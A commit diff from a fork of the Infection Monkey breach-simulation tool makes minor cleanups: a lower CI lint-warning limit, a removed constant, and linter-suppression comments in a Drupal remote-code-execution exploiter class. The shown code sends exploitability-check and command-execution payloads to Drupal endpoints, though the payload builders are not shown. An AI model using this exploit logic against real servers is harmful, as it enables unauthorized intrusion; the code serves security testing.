forked from p15670423/monkey
Merge pull request #824 from guardicore/minor-deadcode-deletion
minor fixes
This commit is contained in:
commit
039a36c5ed
|
@ -72,7 +72,7 @@ script:
|
||||||
## Display the linter issues
|
## Display the linter issues
|
||||||
- cat flake8_warnings.txt
|
- cat flake8_warnings.txt
|
||||||
## Make sure that we haven't increased the amount of warnings.
|
## Make sure that we haven't increased the amount of warnings.
|
||||||
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=90
|
- PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=80
|
||||||
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
|
- if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi
|
||||||
|
|
||||||
## Check import order
|
## Check import order
|
||||||
|
|
|
@ -21,7 +21,6 @@ LOG = logging.getLogger(__name__)
|
||||||
class DrupalExploiter(WebRCE):
|
class DrupalExploiter(WebRCE):
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
_EXPLOITED_SERVICE = 'Drupal Server'
|
_EXPLOITED_SERVICE = 'Drupal Server'
|
||||||
DRUPAL_PORTS = [[80, False], [443, True]]
|
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(DrupalExploiter, self).__init__(host)
|
super(DrupalExploiter, self).__init__(host)
|
||||||
|
@ -73,7 +72,7 @@ class DrupalExploiter(WebRCE):
|
||||||
"""
|
"""
|
||||||
payload = build_exploitability_check_payload(url)
|
payload = build_exploitability_check_payload(url)
|
||||||
|
|
||||||
response = requests.get(f'{url}?_format=hal_json',
|
response = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
|
||||||
json=payload,
|
json=payload,
|
||||||
headers={"Content-Type": "application/hal+json"},
|
headers={"Content-Type": "application/hal+json"},
|
||||||
verify=False)
|
verify=False)
|
||||||
|
@ -90,11 +89,11 @@ class DrupalExploiter(WebRCE):
|
||||||
base = remove_port(url)
|
base = remove_port(url)
|
||||||
payload = build_cmd_execution_payload(base, cmd)
|
payload = build_cmd_execution_payload(base, cmd)
|
||||||
|
|
||||||
r = requests.get(f'{url}?_format=hal_json',
|
r = requests.get(f'{url}?_format=hal_json', # noqa: DUO123
|
||||||
json=payload,
|
json=payload,
|
||||||
headers={"Content-Type": "application/hal+json"},
|
headers={"Content-Type": "application/hal+json"},
|
||||||
verify=False)
|
verify=False)
|
||||||
|
|
||||||
if is_response_cached(r):
|
if is_response_cached(r):
|
||||||
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
LOG.info(f'Exploiting {url} returned cache HIT, may have failed')
|
||||||
|
|
||||||
|
@ -111,7 +110,7 @@ class DrupalExploiter(WebRCE):
|
||||||
:return: vulnerable URL to exploit
|
:return: vulnerable URL to exploit
|
||||||
"""
|
"""
|
||||||
return self.vulnerable_urls.pop()
|
return self.vulnerable_urls.pop()
|
||||||
|
|
||||||
def are_vulnerable_urls_sufficient(self):
|
def are_vulnerable_urls_sufficient(self):
|
||||||
"""
|
"""
|
||||||
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
|
For the Drupal exploit, 5 distinct URLs are needed to perform the full attack.
|
||||||
|
@ -137,7 +136,7 @@ def find_exploitbale_article_ids(base_url: str, lower: int = 1, upper: int = 100
|
||||||
articles = set()
|
articles = set()
|
||||||
while lower < upper:
|
while lower < upper:
|
||||||
node_url = urljoin(base_url, str(lower))
|
node_url = urljoin(base_url, str(lower))
|
||||||
response = requests.get(node_url, verify=False)
|
response = requests.get(node_url, verify=False) # noqa: DUO123
|
||||||
if response.status_code == 200:
|
if response.status_code == 200:
|
||||||
if is_response_cached(response):
|
if is_response_cached(response):
|
||||||
LOG.info(f'Found a cached article at: {node_url}, skipping')
|
LOG.info(f'Found a cached article at: {node_url}, skipping')
|
||||||
|
|
Loading…
Reference in New Issue